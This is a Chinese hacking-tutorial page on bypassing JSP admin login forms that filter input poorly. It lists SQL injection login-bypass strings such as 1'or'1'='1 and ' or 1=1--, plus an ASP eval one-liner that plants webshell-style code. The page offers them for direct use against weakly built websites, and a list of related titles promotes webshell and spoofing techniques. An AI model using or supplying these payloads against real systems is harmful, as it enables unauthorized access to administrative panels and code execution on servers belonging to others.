[推荐]jsp后台利用之过滤不严格字符和曾经asp后台的弱口令('or''=')登陆一样,jsp的后台登陆中也存在着对字符过滤不严格,从而导致可以直接绕过登陆表单而直接进入后台.虽然利用的几率不如03,04年时期的asp后台利用那么大,可是无疑给我们的sentou加了把双刃剑
当遇到 jsp的后台时候,大家不妨试验下下面的,说不定会有以外收获 : )
用户名:1'or'1'='1
密码:1'or'1'='1
以下代码也是对付一些垃圾网站的
a":eval request(chr (35))//'
'or''='
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
| Vista+谷歌拼音输入法重现输入法 | 04-06 | |
| 45种可以拿到Webshell的技巧 | 04-02 | |
| 0起步接触黑客--实用价值相当高 | 04-02 | |
| 普通文件的欺骗手法 | 03-21 | |
| 黑客技术-ARP欺骗 | 03-19 | |
| 跨站Script攻击和防范 | 03-19 | |
| 超级兔子+WinRAR轻松破解收费加密 | 03-16 | |
| 浏览器执行exe文件的探讨 | 03-15 | |
| 菜鸟"搜"大量Web Shell的思路 | 03-14 | |
| 轻松录制在线网络电视的方法 | 03-14 | |
| 突破单位网管封杀QQ、MSN 端口的 | 03-14 | |
| 菜鸟找漏洞—渗透网站的“反思” | 02-06 | |
您现在的位置: